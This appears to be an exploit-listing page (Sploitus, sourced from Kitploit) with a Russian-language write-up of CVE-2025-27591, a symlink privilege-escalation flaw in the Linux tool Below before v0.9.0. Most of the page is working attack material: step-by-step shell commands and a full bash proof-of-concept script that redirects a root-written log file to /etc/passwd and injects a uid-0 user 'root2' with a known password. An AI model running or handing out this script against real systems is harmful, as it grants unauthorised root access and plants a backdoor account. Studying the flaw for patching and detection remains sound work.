Sploitus

Exploit for CVE-2025-27591-below-

kitploit Β· 2026-09-04

Exploit Code

MARKDOWN139 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VISAICYBER-CVE-2025-27591-BELOW-
# CVE-2025-27591 – ΠŸΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π² Below

## 1) Π’Π²Π΅Π΄Π΅Π½ΠΈΠ΅

Below β€” это инструмСнт Linux для записи ΠΈ отобраТСния систСмных Π΄Π°Π½Π½Ρ‹Ρ…, Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ использованиС Π°ΠΏΠΏΠ°Ρ€Π°Ρ‚Π½Ρ‹Ρ… срСдств ΠΈ ΠΌΠ΅Ρ‚Ρ€ΠΈΠΊΠΈ cgroup.

Π’ вСрсиях Π΄ΠΎ **v0.9.0** systemd-сСрвис Below запускаСтся с привилСгиями `root` ΠΈ создаёт общСдоступныС для записи ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ΠΈ ΠΈ Ρ„Π°ΠΉΠ»Ρ‹ Π»ΠΎΠ³ΠΎΠ² Π² `/var/log/below`. Π­Ρ‚Π° нСбСзопасная конфигурация позволяСт ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²Π»ΡΡ‚ΡŒ **Π°Ρ‚Π°ΠΊΠΈ Ρ‡Π΅Ρ€Π΅Π· симлинки** , ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π΄Π°ΡŽΡ‚ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Π½Π΅ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ Π»ΠΎΠΊΠ°Π»ΡŒΠ½ΠΎΠΌΡƒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ свои ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π΄ΠΎ `root`.

Π­Ρ‚ΠΎΠΉ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ΅ присвоСн **CVE-2025-27591**.  
Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ исправили Π΅Ρ‘ Π² вСрсии **v0.9.0**.

* * *

## 2) Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ – Атака Ρ‡Π΅Ρ€Π΅Π· симлинк Π² `/var/log/below`

  * Below Π³Π°Ρ€Π°Π½Ρ‚ΠΈΡ€ΡƒΠ΅Ρ‚, Ρ‡Ρ‚ΠΎ `/var/log/below` ΠΈΠΌΠ΅Π΅Ρ‚ ΠΏΡ€Π°Π²Π° **0777** Π²ΠΎ врСмя выполнСния.
  * Он Ρ‚Π°ΠΊΠΆΠ΅ создаёт `/var/log/below/error_root.log` с ΠΏΡ€Π°Π²Π°ΠΌΠΈ **0666**.
  * ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ доступСн для записи всСм, Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ‚ **Π·Π°ΠΌΠ΅Π½ΠΈΡ‚ΡŒ Ρ„Π°ΠΉΠ» Π»ΠΎΠ³Π° симлинком** Π½Π° любой Ρ‡ΡƒΠ²ΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, `/etc/passwd`).
  * Когда Below записываСт Π»ΠΎΠ³ΠΈ ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ root, ΠΎΠ½ вмСсто этого Π±ΡƒΠ΄Π΅Ρ‚ ΠΏΠΈΡΠ°Ρ‚ΡŒ Π² Ρ†Π΅Π»ΡŒ симлинка, Ρ‡Ρ‚ΠΎ позволяСт ΠΏΠΎΠ²Ρ‹ΡΠΈΡ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ.



Π’Π°ΠΊΠΎΠ΅ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΡ‚ Π·Π°Ρ‰ΠΈΡ‚Ρƒ ядра `protected_symlinks`, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Π½Π΅ примСняСтся sticky-Π±ΠΈΡ‚.

* * *

## 3) Эксплуатация

Направив `error_root.log` Π½Π° `/etc/passwd`, ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ Π²Π½Π΅Π΄Ρ€ΠΈΡ‚ΡŒ Π½ΠΎΠ²ΠΎΠ³ΠΎ root-ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ с извСстным ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΌ.

### Π¨Π°Π³ΠΈ

Π¨Π°Π³ 1: Π‘ΠΎΠ·Π΄Π°ΠΉΡ‚Π΅ Ρ€Π΅Π·Π΅Ρ€Π²Π½ΡƒΡŽ копию `/etc/passwd`. ВсСгда Π΄Π΅Π»Π°ΠΉΡ‚Π΅ Ρ€Π΅Π·Π΅Ρ€Π²Π½ΡƒΡŽ копию ΠΏΠ΅Ρ€Π΅Π΄ ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ΠΌ систСмных Ρ„Π°ΠΉΠ»ΠΎΠ²:

root@kitploit:~
    
    
    cp /etc/passwd /tmp/passwd.bak
    

Π¨Π°Π³ 2: Π‘Π³Π΅Π½Π΅Ρ€ΠΈΡ€ΡƒΠΉΡ‚Π΅ Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ запись ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ

root@kitploit:~
    
    
    HASH=$(openssl passwd -6 'rooted123')
    echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload
    

Π¨Π°Π³ 3: Π‘ΠΎΠ·Π΄Π°ΠΉΡ‚Π΅ симлинк Π½Π° уязвимый Π»ΠΎΠ³

root@kitploit:~
    
    
    rm -f /var/log/below/error_root.log
    ln -s /etc/passwd /var/log/below/error_root.log
    

Π¨Π°Π³ 4: Π˜Π½ΠΈΡ†ΠΈΠΈΡ€ΡƒΠΉΡ‚Π΅ созданиС Π»ΠΎΠ³Π°

root@kitploit:~
    
    
    sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
    

Π¨Π°Π³ 5: ΠŸΠ΅Ρ€Π΅Π·Π°ΠΏΠΈΡˆΠΈΡ‚Π΅ `/etc/passwd`

root@kitploit:~
    
    
    cat /tmp/payload > /var/log/below/error_root.log
    

Π¨Π°Π³ 6: ΠŸΠ΅Ρ€Π΅ΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅ΡΡŒ Π½Π° Π½ΠΎΠ²ΠΎΠ³ΠΎ root-ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ

root@kitploit:~
    
    
    su root2
    # password: rooted123
    

* * *

## 4) Π”ΠΎΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒΡΡ‚Π²ΠΎ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ (PoC): ЗапуститС этот скрипт

root@kitploit:~
    
    
    #!/bin/bash
    # CVE-2025-27591 Exploit - Privilege Escalation via 'below'
    
    TARGET="/etc/passwd"
    LINK_PATH="/var/log/below/error_root.log"
    TMP_PAYLOAD="/tmp/payload"
    BACKUP="/tmp/passwd.bak"
    
    echo "[*] CVE-2025-27591 Privilege Escalation Exploit"
    
    # Check for sudo access to below
    echo "[*] Checking sudo permissions..."
    if ! sudo -l | grep -q '/usr/bin/below'; then
      echo "[!] 'below' is not available via sudo. Exiting."
      exit 1
    fi
    
    # Backup current /etc/passwd
    echo "[*] Backing up /etc/passwd to $BACKUP"
    cp /etc/passwd "$BACKUP"
    
    # Generate password hash for 'root2' user (password: rooted123)
    echo "[*] Generating password hash..."
    HASH=$(openssl passwd -6 'rooted123')
    
    # Prepare malicious passwd line
    echo "[*] Creating malicious passwd line..."
    echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"
    
    # Create symlink
    echo "[*] Linking $LINK_PATH to $TARGET"
    rm -f "$LINK_PATH"
    ln -sf "$TARGET" "$LINK_PATH"
    
    # Trigger log creation with invalid --time to force below to recreate the log
    echo "[*] Triggering 'below' to write to symlinked log..."
    sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
    
    # Overwrite passwd file via symlink
    echo "[*] Injecting malicious user into /etc/passwd"
    cat "$TMP_PAYLOAD" > "$LINK_PATH"
    
    # Test access
    echo "[*] Try switching to 'root2' using password: rooted123"
    su root2
    

![CVE-2025-27591](https://assets.kitploit.com/production/public/readmes/21514/8067bbbe950c08e0d355b5d2cd80bce82c77b2475a9686114c6caa561f1f73d6.png)